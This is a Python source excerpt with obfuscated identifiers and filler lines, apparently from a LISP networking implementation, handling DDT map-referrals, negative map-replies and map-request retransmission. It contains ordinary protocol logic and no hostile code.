if 61 - 61: Ii1I - i1IIi / ooOoO0o - Oo0Ooo / IiII % Oo0Ooo
if 53 - 53: OoooooooOO + iII111i % II111iiii * IiII
if 10 - 10: OoOoOO00 % I11i
if 46 - 46: i1IIi % IiII
if 45 - 45: I1ii11iIi11i / I1ii11iIi11i - OoO0O00
if 54 - 54: Ii1I + I1IiiI * OoOoOO00 + oO0o
if 10 - 10: Ii1I - I1IiiI / IiII / iII111i - I1Ii111 - o0oOOo0O0Ooo
if 75 - 75: OOooOOo . ooOoO0o
if 32 - 32: i1IIi / I11i + iIii1I11I1II1 . OOooOOo
if 67 - 67: iII111i - OoO0O00 % I1ii11iIi11i * Oo0Ooo
if 51 - 51: I1IiiI + O0
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
I11I1 = eid . hash_address ( entry_prefix )
iIi1I = eid . addr_length ( ) * 8
ooOoO00 = 0
if 15 - 15: OoooooooOO * I1ii11iIi11i + o0oOOo0O0Ooo - oO0o + II111iiii
if 96 - 96: OoO0O00 - II111iiii - I1IiiI % ooOoO0o
if 78 - 78: I11i / Ii1I . IiII / o0oOOo0O0Ooo / OoO0O00 + OoOoOO00
if 50 - 50: Ii1I
for ooOoO00 in range ( iIi1I ) :
o0ooo0o0Oo = 1 << ( iIi1I - ooOoO00 - 1 )
if ( I11I1 & o0ooo0o0Oo ) : break
if 24 - 24: I11i . Ii1I / ooOoO0o + I1ii11iIi11i + OoooooooOO - I11i
if 51 - 51: I1IiiI % i1IIi + ooOoO0o / I1ii11iIi11i % iIii1I11I1II1 % IiII
if ( ooOoO00 > neg_prefix . mask_len ) : neg_prefix . mask_len = ooOoO00
return
if 12 - 12: OoOoOO00 * OoO0O00 / IiII - OoO0O00 * o0oOOo0O0Ooo * iII111i
if 84 - 84: ooOoO0o * OOooOOo / I1Ii111 * I1IiiI * ooOoO0o
if 75 - 75: oO0o
if 60 - 60: OoOoOO00 % I1IiiI . i11iIiiIii % OoOoOO00 - I1Ii111
if 71 - 71: OoooooooOO * Oo0Ooo
if 80 - 80: iIii1I11I1II1
if 91 - 91: OoOoOO00 + OoOoOO00 + ooOoO0o
if 44 - 44: I1ii11iIi11i * OOooOOo % OoO0O00 . I1IiiI % Ii1I + II111iiii
if 100 - 100: oO0o - II111iiii . o0oOOo0O0Ooo
if 63 - 63: OoOoOO00 % IiII . iII111i
def lisp_neg_prefix_walk ( entry , parms ) :
I11I , iiiI1I , i1iI1II = parms
if 90 - 90: OOooOOo
if ( iiiI1I == None ) :
if ( entry . eid . instance_id != I11I . instance_id ) :
return ( [ True , parms ] )
if 69 - 69: OOooOOo . I11i . I11i
if ( entry . eid . afi != I11I . afi ) : return ( [ True , parms ] )
else :
if ( entry . eid . is_more_specific ( iiiI1I ) == False ) :
return ( [ True , parms ] )
if 4 - 4: O0 + I11i / OoOoOO00 * iIii1I11I1II1 . Ii1I
if 68 - 68: Oo0Ooo % ooOoO0o + i11iIiiIii / oO0o / II111iiii
if 63 - 63: OoO0O00 % i1IIi - OoooooooOO / ooOoO0o
if 75 - 75: OOooOOo + IiII + ooOoO0o / I1IiiI . iIii1I11I1II1 / Oo0Ooo
if 81 - 81: I1Ii111 % II111iiii - Oo0Ooo / I1IiiI + i11iIiiIii . I11i
if 67 - 67: ooOoO0o . I1Ii111 . Oo0Ooo . Ii1I + iIii1I11I1II1 / OoooooooOO
lisp_find_negative_mask_len ( I11I , entry . eid , i1iI1II )
return ( [ True , parms ] )
if 93 - 93: ooOoO0o * OoO0O00 - I1Ii111 / I1ii11iIi11i
if 60 - 60: OoO0O00 / oO0o . I1IiiI + OoOoOO00 + I1ii11iIi11i % Ii1I
if 70 - 70: i1IIi * II111iiii * I1IiiI
if 7 - 7: OoooooooOO + II111iiii % o0oOOo0O0Ooo * O0 . OoO0O00 * OoooooooOO
if 20 - 20: Oo0Ooo % OOooOOo
if 8 - 8: OOooOOo
if 92 - 92: iII111i / OOooOOo . IiII / I11i + o0oOOo0O0Ooo
if 99 - 99: II111iiii
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
if 70 - 70: O0 % I1ii11iIi11i
if 28 - 28: IiII - i1IIi - I1Ii111 % Ii1I - IiII
if 73 - 73: iIii1I11I1II1 . iIii1I11I1II1 + oO0o % i11iIiiIii . IiII
if 33 - 33: IiII - OOooOOo / i11iIiiIii * iIii1I11I1II1
if ( eid . is_binary ( ) == False ) : return ( eid )
if 2 - 2: i11iIiiIii % ooOoO0o
i1iI1II = lisp_address ( eid . afi , "" , 0 , 0 )
i1iI1II . copy_address ( eid )
i1iI1II . mask_len = 0
if 56 - 56: IiII % ooOoO0o + I1IiiI % I11i - OOooOOo
OoiI = ddt_entry . print_eid_tuple ( )
iiiI1I = ddt_entry . eid
if 42 - 42: iIii1I11I1II1 . oO0o
if 17 - 17: OoO0O00 / OoO0O00 + o0oOOo0O0Ooo / OOooOOo . I1ii11iIi11i % IiII
if 40 - 40: OoOoOO00
if 81 - 81: Ii1I % I1Ii111 / I1ii11iIi11i % iII111i
if 39 - 39: i1IIi . iII111i . Oo0Ooo % Oo0Ooo * IiII % Ii1I
eid , iiiI1I , i1iI1II = cache . walk_cache ( lisp_neg_prefix_walk ,
( eid , iiiI1I , i1iI1II ) )
if 40 - 40: o0oOOo0O0Ooo * i11iIiiIii . ooOoO0o
if 63 - 63: I1Ii111 / Ii1I - iIii1I11I1II1 / i11iIiiIii / IiII + I11i
if 57 - 57: iIii1I11I1II1 % iIii1I11I1II1
if 23 - 23: II111iiii . ooOoO0o % I1Ii111
i1iI1II . mask_address ( i1iI1II . mask_len )
if 39 - 39: OoooooooOO
lprint ( ( "Least specific prefix computed from ddt-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# i1IIi
OoiI , i1iI1II . print_prefix ( ) ) )
return ( i1iI1II )
if 87 - 87: Ii1I * I1IiiI + Oo0Ooo
if 51 - 51: I1IiiI
if 51 - 51: ooOoO0o / Oo0Ooo - I1Ii111 - iII111i
if 68 - 68: I1ii11iIi11i - iIii1I11I1II1 * OoooooooOO
if 44 - 44: OoooooooOO + I1Ii111 + OoO0O00
if 15 - 15: iIii1I11I1II1 % i1IIi + iII111i
if 48 - 48: o0oOOo0O0Ooo / oO0o
if 61 - 61: I1IiiI + iII111i * Ii1I % I1Ii111 . Ii1I
def lisp_ms_compute_neg_prefix ( eid , group ) :
i1iI1II = lisp_address ( eid . afi , "" , 0 , 0 )
i1iI1II . copy_address ( eid )
i1iI1II . mask_len = 0
Oo0O0ooo0o0O = lisp_address ( group . afi , "" , 0 , 0 )
Oo0O0ooo0o0O . copy_address ( group )
Oo0O0ooo0o0O . mask_len = 0
iiiI1I = None
if 58 - 58: Oo0Ooo / i1IIi
if 10 - 10: OOooOOo - i11iIiiIii - I1Ii111 / iIii1I11I1II1 % iII111i - I11i
if 97 - 97: IiII - OoOoOO00 + OoOoOO00 % iIii1I11I1II1 - I1Ii111 . O0
if 88 - 88: o0oOOo0O0Ooo - i1IIi
if 47 - 47: Ii1I + OoO0O00 - Ii1I % Ii1I
if ( group . is_null ( ) ) :
IIi1Ii1i11i = lisp_ddt_cache . lookup_cache ( eid , False )
if ( IIi1Ii1i11i == None ) :
i1iI1II . mask_len = i1iI1II . host_mask_len ( )
Oo0O0ooo0o0O . mask_len = Oo0O0ooo0o0O . host_mask_len ( )
return ( [ i1iI1II , Oo0O0ooo0o0O , LISP_DDT_ACTION_NOT_AUTH ] )
if 65 - 65: I1Ii111 * iIii1I11I1II1
IiiI1I1IiIIii = lisp_sites_by_eid
if ( IIi1Ii1i11i . is_auth_prefix ( ) ) : iiiI1I = IIi1Ii1i11i . eid
else :
IIi1Ii1i11i = lisp_ddt_cache . lookup_cache ( group , False )
if ( IIi1Ii1i11i == None ) :
i1iI1II . mask_len = i1iI1II . host_mask_len ( )
Oo0O0ooo0o0O . mask_len = Oo0O0ooo0o0O . host_mask_len ( )
return ( [ i1iI1II , Oo0O0ooo0o0O , LISP_DDT_ACTION_NOT_AUTH ] )
if 81 - 81: O0 + II111iiii * ooOoO0o / i1IIi
if ( IIi1Ii1i11i . is_auth_prefix ( ) ) : iiiI1I = IIi1Ii1i11i . group
if 38 - 38: Oo0Ooo - OoOoOO00 % IiII % OoooooooOO
group , iiiI1I , Oo0O0ooo0o0O = lisp_sites_by_eid . walk_cache ( lisp_neg_prefix_walk , ( group , iiiI1I , Oo0O0ooo0o0O ) )
if 79 - 79: II111iiii % OOooOOo / I1ii11iIi11i % Oo0Ooo - o0oOOo0O0Ooo
if 60 - 60: IiII + ooOoO0o - iII111i
Oo0O0ooo0o0O . mask_address ( Oo0O0ooo0o0O . mask_len )
if 69 - 69: iIii1I11I1II1 + oO0o
lprint ( ( "Least specific prefix computed from site-cache for " + "group EID {} using auth-prefix {} is {}" ) . format ( group . print_address ( ) , iiiI1I . print_prefix ( ) if ( iiiI1I != None ) else "'not found'" ,
# ooOoO0o
# IiII + I11i
# ooOoO0o + ooOoO0o + o0oOOo0O0Ooo - o0oOOo0O0Ooo % Ii1I
Oo0O0ooo0o0O . print_prefix ( ) ) )
if 52 - 52: I11i % i1IIi . I1ii11iIi11i
IiiI1I1IiIIii = IIi1Ii1i11i . source_cache
if 62 - 62: ooOoO0o - I1ii11iIi11i
if 71 - 71: I11i
if 34 - 34: oO0o / O0 * oO0o
if 47 - 47: iIii1I11I1II1 - o0oOOo0O0Ooo % Ii1I
if 38 - 38: ooOoO0o / IiII * I1ii11iIi11i % I1ii11iIi11i % oO0o
oOoO0OooO0O = LISP_DDT_ACTION_DELEGATION_HOLE if ( iiiI1I != None ) else LISP_DDT_ACTION_NOT_AUTH
if 82 - 82: I1ii11iIi11i . i11iIiiIii - I11i . iII111i / OOooOOo
if 60 - 60: I1IiiI / I1IiiI / II111iiii
if 59 - 59: OOooOOo . oO0o + ooOoO0o % o0oOOo0O0Ooo . i11iIiiIii
if 27 - 27: OoOoOO00 - OoooooooOO / IiII / II111iiii * OOooOOo * ooOoO0o
if 43 - 43: II111iiii . IiII - I1IiiI * I1ii11iIi11i + OoooooooOO
if 34 - 34: I1Ii111 / i1IIi
eid , iiiI1I , i1iI1II = IiiI1I1IiIIii . walk_cache ( lisp_neg_prefix_walk ,
( eid , iiiI1I , i1iI1II ) )
if 95 - 95: OoOoOO00 * OOooOOo
if 68 - 68: I1Ii111 / iIii1I11I1II1 % Ii1I
if 77 - 77: i11iIiiIii + i11iIiiIii - I1ii11iIi11i % I1ii11iIi11i
if 26 - 26: oO0o + OoooooooOO % o0oOOo0O0Ooo
i1iI1II . mask_address ( i1iI1II . mask_len )
if 96 - 96: ooOoO0o * OoOoOO00 - II111iiii
lprint ( ( "Least specific prefix computed from site-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# ooOoO0o * OoOoOO00 - OOooOOo
# IiII % OoOoOO00 % Ii1I
iiiI1I . print_prefix ( ) if ( iiiI1I != None ) else "'not found'" , i1iI1II . print_prefix ( ) ) )
if 18 - 18: OoO0O00 + i1IIi - O0 * Ii1I . Oo0Ooo
if 99 - 99: iIii1I11I1II1 + o0oOOo0O0Ooo + IiII % I1IiiI + ooOoO0o . Ii1I
return ( [ i1iI1II , Oo0O0ooo0o0O , oOoO0OooO0O ] )
if 75 - 75: OOooOOo / II111iiii - Oo0Ooo + I1Ii111
if 42 - 42: OoooooooOO * II111iiii + Ii1I % OoO0O00 / I1Ii111
if 11 - 11: ooOoO0o / Oo0Ooo + i1IIi / IiII
if 4 - 4: iII111i - Oo0Ooo
if 100 - 100: OOooOOo . i1IIi
if 15 - 15: O0 % Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o * iII111i % O0
if 31 - 31: i1IIi . Ii1I - OoooooooOO * I11i * ooOoO0o % oO0o
if 61 - 61: I1Ii111 . Ii1I * I1ii11iIi11i
def lisp_ms_send_map_referral ( lisp_sockets , map_request , ecm_source , port ,
action , eid_prefix , group_prefix ) :
if 59 - 59: OoOoOO00 + Oo0Ooo . I1ii11iIi11i - Ii1I
I11I = map_request . target_eid
o0o0o = map_request . target_group
OOO0O0O = map_request . nonce
if 48 - 48: I1Ii111 % Ii1I + I1IiiI * OoooooooOO % OoOoOO00 % i11iIiiIii
if ( action == LISP_DDT_ACTION_MS_ACK ) : O0O00O = 1440
if 13 - 13: iII111i % i1IIi
if 13 - 13: iII111i / OoooooooOO + Ii1I / iII111i
if 29 - 29: OOooOOo + ooOoO0o % o0oOOo0O0Ooo
if 18 - 18: I11i + OoO0O00 + OoO0O00 . ooOoO0o
oO00oO0o = lisp_map_referral ( )
oO00oO0o . record_count = 1
oO00oO0o . nonce = OOO0O0O
OO0Oo00OO0oo = oO00oO0o . encode ( )
oO00oO0o . print_map_referral ( )
if 37 - 37: i1IIi . IiII + I1IiiI % OoOoOO00
oO00O0o0Oo = False
if 3 - 3: i11iIiiIii + Ii1I % IiII - I1Ii111 / Oo0Ooo % iIii1I11I1II1
if 86 - 86: Oo0Ooo + Oo0Ooo * oO0o * I1IiiI
if 95 - 95: IiII - OoO0O00 + OOooOOo
if 33 - 33: o0oOOo0O0Ooo . i11iIiiIii . ooOoO0o
if 100 - 100: i11iIiiIii % I1Ii111 - OoO0O00 + I1Ii111 / i11iIiiIii + OOooOOo
if 55 - 55: i11iIiiIii / I1Ii111 . OOooOOo - OoO0O00
if ( action == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
eid_prefix , group_prefix , action = lisp_ms_compute_neg_prefix ( I11I ,
o0o0o )
O0O00O = 15
if 60 - 60: OoOoOO00 / i1IIi . Ii1I - OoO0O00 - OoooooooOO
if ( action == LISP_DDT_ACTION_MS_NOT_REG ) : O0O00O = 1
if ( action == LISP_DDT_ACTION_MS_ACK ) : O0O00O = 1440
if ( action == LISP_DDT_ACTION_DELEGATION_HOLE ) : O0O00O = 15
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : O0O00O = 0
if 39 - 39: I1IiiI + i1IIi * OoO0O00 % I11i
iI1i111ii1IiI = False
O000O0 = 0
IIi1Ii1i11i = lisp_ddt_cache_lookup ( I11I , o0o0o , False )
if ( IIi1Ii1i11i != None ) :
O000O0 = len ( IIi1Ii1i11i . delegation_set )
iI1i111ii1IiI = IIi1Ii1i11i . is_ms_peer_entry ( )
IIi1Ii1i11i . map_referrals_sent += 1
if 21 - 21: II111iiii + I1IiiI / oO0o . I1Ii111 . OoOoOO00 . Ii1I
if 3 - 3: I1ii11iIi11i * O0 . Oo0Ooo
if 59 - 59: OoO0O00 * o0oOOo0O0Ooo . I11i
if 32 - 32: I1ii11iIi11i
if 44 - 44: i1IIi * OoO0O00
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : oO00O0o0Oo = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
oO00O0o0Oo = ( iI1i111ii1IiI == False )
if 21 - 21: Oo0Ooo - II111iiii + I11i
if 69 - 69: Oo0Ooo - iIii1I11I1II1 . oO0o
if 54 - 54: Ii1I / Oo0Ooo - i1IIi * OoooooooOO - OoOoOO00 + OoOoOO00
if 24 - 24: i1IIi . OoOoOO00 / I1Ii111 + O0
if 86 - 86: Ii1I * OoOoOO00 % I1ii11iIi11i + OOooOOo
IiOo0oOoooO = lisp_eid_record ( )
IiOo0oOoooO . rloc_count = O000O0
IiOo0oOoooO . authoritative = True
IiOo0oOoooO . action = action
IiOo0oOoooO . ddt_incomplete = oO00O0o0Oo
IiOo0oOoooO . eid = eid_prefix
IiOo0oOoooO . group = group_prefix
IiOo0oOoooO . record_ttl = O0O00O
if 85 - 85: iII111i % i11iIiiIii
OO0Oo00OO0oo += IiOo0oOoooO . encode ( )
IiOo0oOoooO . print_record ( " " , True )
if 78 - 78: i11iIiiIii / I11i / Oo0Ooo + II111iiii - I1ii11iIi11i / I1ii11iIi11i
if 28 - 28: iIii1I11I1II1 / IiII - iIii1I11I1II1 . i1IIi - O0 * ooOoO0o
if 41 - 41: Ii1I + IiII
if 37 - 37: I1Ii111 / o0oOOo0O0Ooo - ooOoO0o - OoooooooOO . I1ii11iIi11i % I1Ii111
if ( O000O0 != 0 ) :
for IiI11111I1ii1 in IIi1Ii1i11i . delegation_set :
oOiI111IIIiIii = lisp_rloc_record ( )
oOiI111IIIiIii . rloc = IiI11111I1ii1 . delegate_address
oOiI111IIIiIii . priority = IiI11111I1ii1 . priority
oOiI111IIIiIii . weight = IiI11111I1ii1 . weight
oOiI111IIIiIii . mpriority = 255
oOiI111IIIiIii . mweight = 0
oOiI111IIIiIii . reach_bit = True
OO0Oo00OO0oo += oOiI111IIIiIii . encode ( )
oOiI111IIIiIii . print_record ( " " )
if 53 - 53: I1IiiI % OOooOOo + Ii1I - Ii1I
if 99 - 99: i1IIi * OoOoOO00 - i1IIi
if 65 - 65: OoO0O00 / i11iIiiIii + I1ii11iIi11i + OoOoOO00
if 82 - 82: Ii1I * OOooOOo % ooOoO0o / OoO0O00 - Oo0Ooo . I1Ii111
if 90 - 90: I11i * i11iIiiIii % i1IIi + I1Ii111 / OoO0O00
if 15 - 15: Oo0Ooo + oO0o . I11i % OoO0O00
if 13 - 13: I1ii11iIi11i / ooOoO0o * I1Ii111
if ( map_request . nonce != 0 ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , OO0Oo00OO0oo , ecm_source , port )
return
if 45 - 45: I1ii11iIi11i - I11i
if 60 - 60: OOooOOo - OOooOOo * OoOoOO00 / Ii1I % iII111i % Oo0Ooo
if 75 - 75: iIii1I11I1II1 - IiII - I1Ii111
if 4 - 4: i11iIiiIii % OoooooooOO . i11iIiiIii
if 61 - 61: iIii1I11I1II1 . Oo0Ooo . i1IIi
if 45 - 45: I1Ii111
if 49 - 49: i1IIi * iII111i - iIii1I11I1II1 % I11i * O0 / OoOoOO00
if 48 - 48: IiII
def lisp_send_negative_map_reply ( sockets , eid , group , nonce , dest , port , ttl ,
xtr_id , pubsub ) :
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii - OOooOOo - o0oOOo0O0Ooo
lprint ( "Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}" . format ( lisp_print_eid_tuple ( eid , group ) , lisp_hex_string ( nonce ) ,
# I1Ii111 + iIii1I11I1II1 - OoooooooOO + I1IiiI + I1Ii111 + OoOoOO00
red ( dest . print_address ( ) , False ) ) )
if 38 - 38: OoO0O00 - I1Ii111 / II111iiii % I1IiiI % oO0o % IiII
oOoO0OooO0O = LISP_NATIVE_FORWARD_ACTION if group . is_null ( ) else LISP_DROP_ACTION
if 49 - 49: i11iIiiIii + I1IiiI . I11i % OOooOOo
if 74 - 74: o0oOOo0O0Ooo . I1IiiI / i1IIi + OoOoOO00
if 30 - 30: iIii1I11I1II1 + OoooooooOO - I1Ii111
if 2 - 2: Ii1I + I11i
if 94 - 94: OoO0O00 / i11iIiiIii
if ( lisp_get_eid_hash ( eid ) != None ) :
oOoO0OooO0O = LISP_SEND_MAP_REQUEST_ACTION
if 68 - 68: iIii1I11I1II1 % Oo0Ooo + Oo0Ooo
if 44 - 44: I11i / OoO0O00
OO0Oo00OO0oo = lisp_build_map_reply ( eid , group , [ ] , nonce , oOoO0OooO0O , ttl , None ,
None , False , False )
if 66 - 66: i11iIiiIii
if 83 - 83: I1Ii111 / iIii1I11I1II1 - oO0o
if 3 - 3: OOooOOo - Oo0Ooo * I1IiiI - OoO0O00 / OOooOOo + IiII
if 83 - 83: i1IIi * i1IIi - II111iiii / OoooooooOO . Ii1I + I1Ii111
if ( pubsub ) :
lisp_process_pubsub ( sockets , OO0Oo00OO0oo , eid , dest , port , nonce , ttl ,
xtr_id )
else :
lisp_send_map_reply ( sockets , OO0Oo00OO0oo , dest , port )
if 10 - 10: I11i
return
if 24 - 24: Ii1I
if 30 - 30: II111iiii / Ii1I - I11i - OoO0O00
if 25 - 25: I11i % i1IIi / I11i * i11iIiiIii
if 71 - 71: IiII % I11i - OoooooooOO + I1IiiI / Oo0Ooo % I11i
if 6 - 6: i1IIi * i11iIiiIii + ooOoO0o - IiII
if 97 - 97: iIii1I11I1II1 * i1IIi * II111iiii - OOooOOo - Oo0Ooo - iIii1I11I1II1
if 26 - 26: ooOoO0o + Oo0Ooo
def lisp_retransmit_ddt_map_request ( mr ) :
iIiIII = mr . mr_source . print_address ( )
o0OO0OooooO = mr . print_eid_tuple ( )
OOO0O0O = mr . nonce
if 51 - 51: I1Ii111 . O0 - OoOoOO00 + i11iIiiIii * II111iiii
if 39 - 39: iII111i . OoO0O00 % I1IiiI * II111iiii * OoooooooOO . II111iiii
if 97 - 97: oO0o - Ii1I - II111iiii % II111iiii * OOooOOo
if 84 - 84: i1IIi . OoOoOO00 % I1ii11iIi11i . OoO0O00 + i11iIiiIii
if 19 - 19: i1IIi / I1IiiI + IiII . iII111i
if ( mr . last_request_sent_to ) :
oo0oo0o0OoO = mr . last_request_sent_to . print_address ( )
iii1Ii = lisp_referral_cache_lookup ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] , True )
if ( iii1Ii and oo0oo0o0OoO in iii1Ii . referral_set ) :
iii1Ii . referral_set [ oo0oo0o0OoO ] . no_responses += 1
if 9 - 9: IiII * O0 + OOooOOo . II111iiii
if 14 - 14: iIii1I11I1II1 + i11iIiiIii + o0oOOo0O0Ooo + o0oOOo0O0Ooo - IiII / I1Ii111
if 70 - 70: OoooooooOO + I1IiiI / OOooOOo
if 19 - 19: I1Ii111 + i1IIi % OoooooooOO + i1IIi
if 16 - 16: I1Ii111 + II111iiii + IiII
if 34 - 34: iIii1I11I1II1 - II111iiii - ooOoO0o + oO0o
if 46 - 46: ooOoO0o % II111iiii
if ( mr . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "DDT Map-Request retry limit reached for EID {}, nonce 0x{}" . format ( green ( o0OO0OooooO , False ) , lisp_hex_string ( OOO0O0O ) ) )
if 61 - 61: OoO0O00 . I1IiiI
mr . dequeue_map_request ( )
return
if 89 - 89: IiII
if 73 - 73: II111iiii + ooOoO0o % OOooOOo . oO0o / oO0o * i1IIi
mr . retry_count += 1
if 19 - 19: I1Ii111 + I11i
I1iiIi111I = green ( iIiIII , False )
iiIi = green ( o0OO0OooooO , False )
lprint ( "Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( bold ( "Map-Request" , False ) , "P" if mr . from_pitr else "" ,
# OoOoOO00 . i11iIiiIii
red ( mr . itr . print_address ( ) , False ) , I1iiIi111I , iiIi ,
lisp_hex_string ( OOO0O0O ) ) )
if 25 - 25: i1IIi
if 69 - 69: OOooOOo / Ii1I
if 67 - 67: i11iIiiIii . II111iiii + OoooooooOO % o0oOOo0O0Ooo + IiII * i1IIi
if 53 - 53: oO0o * OoooooooOO + II111iiii . IiII * I1ii11iIi11i
lisp_send_ddt_map_request ( mr , False )
if 55 - 55: OoOoOO00
if 27 - 27: I1IiiI
if 81 - 81: Oo0Ooo
if 43 - 43: i1IIi * O0 + ooOoO0o + OoO0O00
mr . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ mr ] )
mr . retransmit_timer . start ( )
return
if 99 - 99: IiII . OoOoOO00
if 64 - 64: I1Ii111
if 96 - 96: Ii1I
if 100 - 100: ooOoO0o
if 43 - 43: Ii1I * ooOoO0o + O0 . II111iiii
if 8 - 8: IiII * OOooOOo + I11i + O0 * oO0o - oO0o
if 19 - 19: OoO0O00 - ooOoO0o + I1ii11iIi11i / I1ii11iIi11i % I1Ii111 % iIii1I11I1II1
if 5 - 5: OoooooooOO + ooOoO0o - II111iiii . i11iIiiIii / oO0o - ooOoO0o
def lisp_get_referral_node ( referral , source_eid , dest_eid ) :
if 3 - 3: iII111i
if 74 - 74: i11iIiiIii + OoooooooOO . OOooOOo
if 29 - 29: IiII % OoO0O00
if 53 - 53: OoooooooOO - OoOoOO00 / IiII - I1Ii111
IiI1 = [ ]
for ooO00O0oOO in list ( referral . referral_set . values ( ) ) :
if ( ooO00O0oOO . updown == False ) : continue
if ( len ( IiI1 ) == 0 or IiI1 [ 0 ] . priority == ooO00O0oOO . priority ) :
IiI1 . append ( ooO00O0oOO )
elif ( IiI1 [ 0 ] . priority > ooO00O0oOO . priority ) :
IiI1 = [ ]
IiI1 . append ( ooO00O0oOO )
if 41 - 41: OoOoOO00 - O0
if 48 - 48: OoooooooOO % Ii1I * OoO0O00 / I1ii11iIi11i
if 53 - 53: ooOoO0o + oO0o - II111iiii
OOo000Oo = len ( IiI1 )
if ( OOo000Oo == 0 ) : return ( None )
if 19 - 19: oO0o . i1IIi . Oo0Ooo
iiIIII11iIii = dest_eid . hash_address ( source_eid )
iiIIII11iIii = iiIIII11iIii % OOo000Oo
return ( IiI1 [ iiIIII11iIii ] )
if 59 - 59: i1IIi / Ii1I . I1ii11iIi11i % II111iiii
if 12 - 12: OoO0O00
if 10 - 10: I1Ii111 / OoooooooOO / OoO0O00 * ooOoO0o
if 81 - 81: i1IIi % I11i * iIii1I11I1II1
if 39 - 39: iIii1I11I1II1 / O0 . OoooooooOO - O0 . OoO0O00 . oO0o
if 59 - 59: II111iiii * I1IiiI
if 12 - 12: i11iIiiIii - IiII . iII111i . Ii1I
def lisp_send_ddt_map_request ( mr , send_to_root ) :
IiI11IIIIIi = mr . lisp_sockets
OOO0O0O = mr . nonce
I1IoOO0oOOOOO0 = mr . itr
Ii1OoOoOoO = mr . mr_source
iIiI1I1ii1I1 = mr . print_eid_tuple ( )
if 97 - 97: OoO0O00 + I1IiiI . i11iIiiIii
if 48 - 48: iIii1I11I1II1 / OOooOOo + I1Ii111
if 85 - 85: Ii1I % ooOoO0o . I1IiiI
if 47 - 47: I1Ii111 - I1ii11iIi11i * OoO0O00 % IiII % ooOoO0o . I1IiiI
if 96 - 96: II111iiii
if ( mr . send_count == 8 ) :
lprint ( "Giving up on map-request-queue entry {}, nonce 0x{}" . format ( green ( iIiI1I1ii1I1 , False ) , lisp_hex_string ( OOO0O0O ) ) )
if 73 - 73: II111iiii
mr . dequeue_map_request ( )
return
if 81 - 81: I1IiiI + OoO0O00
if 22 - 22: OoO0O00 * OoOoOO00 * I11i * IiII . OoO0O00 . I1ii11iIi11i
if 32 - 32: o0oOOo0O0Ooo - iII111i + i11iIiiIii / ooOoO0o . OoOoOO00 . IiII
if 9 - 9: iIii1I11I1II1
if 66 - 66: iIii1I11I1II1
if 13 - 13: O0 / ooOoO0o
if ( send_to_root ) :
OoooOO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iI111iiI = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
mr . tried_root = True
lprint ( "Jumping up to root for EID {}" . format ( green ( iIiI1I1ii1I1 , False ) ) )
else :
OoooOO0 = mr . eid
iI111iiI = mr . group
if 6 - 6: iII111i + II111iiii . IiII . Ii1I / ooOoO0o / I11i
if 85 - 85: ooOoO0o / II111iiii / OoO0O00 + Ii1I / i1IIi . iII111i
if 65 - 65: iIii1I11I1II1 * O0 . II111iiii * o0oOOo0O0Ooo . I1ii11iIi11i * I1IiiI
if 63 - 63: II111iiii . Oo0Ooo % iIii1I11I1II1
if 85 - 85: I1IiiI + i1IIi % I1Ii111
oooo0o0o00o = lisp_referral_cache_lookup ( OoooOO0 , iI111iiI , False )
if ( oooo0o0o00o == None ) :
lprint ( "No referral cache entry found" )
lisp_send_negative_map_reply ( IiI11IIIIIi , OoooOO0 , iI111iiI ,
OOO0O0O , I1IoOO0oOOOOO0 , mr . sport , 15 , None , False )
return
if 23 - 23: I11i - oO0o % i11iIiiIii % I1ii11iIi11i + OOooOOo
if 64 - 64: OOooOOo - I11i / I1ii11iIi11i . Ii1I
i1IO0ooo00 = oooo0o0o00o . print_eid_tuple ( )
lprint ( "Found referral cache entry {}, referral-type: {}" . format ( i1IO0ooo00 ,
oooo0o0o00o . print_referral_type ( ) ) )
if 86 - 86: oO0o + OOooOOo . o0oOOo0O0Ooo
ooO00O0oOO = lisp_get_referral_node ( oooo0o0o00o , Ii1OoOoOoO , mr . eid )
if ( ooO00O0oOO == None ) :
lprint ( "No reachable referral-nodes found" )
mr . dequeue_map_request ( )
lisp_send_negative_map_reply ( IiI11IIIIIi , oooo0o0o00o . eid ,
oooo0o0o00o . group , OOO0O0O , I1IoOO0oOOOOO0 , mr . sport , 1 , None , False )
return
if 37 - 37: i1IIi + iII111i - IiII + ooOoO0o . i1IIi % i11iIiiIii
if 92 - 92: I1IiiI
lprint ( "Send DDT Map-Request to {} {} for EID {}, nonce 0x{}" . format ( ooO00O0oOO . referral_address . print_address ( ) ,
# OoO0O00 - I11i - Oo0Ooo
oooo0o0o00o . print_referral_type ( ) , green ( iIiI1I1ii1I1 , False ) ,
lisp_hex_string ( OOO0O0O ) ) )
if 57 - 57: I1Ii111 % i11iIiiIii
if 36 - 36: O0 . I11i / o0oOOo0O0Ooo + i1IIi + oO0o * IiII
if 29 - 29: O0 - II111iiii + iII111i
if 73 - 73: I1Ii111 - I11i + IiII - o0oOOo0O0Ooo - I11i - OOooOOo
Ii1oO0o0ooo = ( oooo0o0o00o . referral_type == LISP_DDT_ACTION_MS_REFERRAL or
oooo0o0o00o . referral_type == LISP_DDT_ACTION_MS_ACK )
lisp_send_ecm ( IiI11IIIIIi , mr . packet , Ii1OoOoOoO , mr . sport , mr . eid ,
ooO00O0oOO . referral_address , to_ms = Ii1oO0o0ooo , ddt = True )
if 33 - 33: i11iIiiIii . iII111i % o0oOOo0O0Ooo
if 35 - 35: OoO0O00 + OOooOOo % II111iiii * Ii1I / OoOoOO00
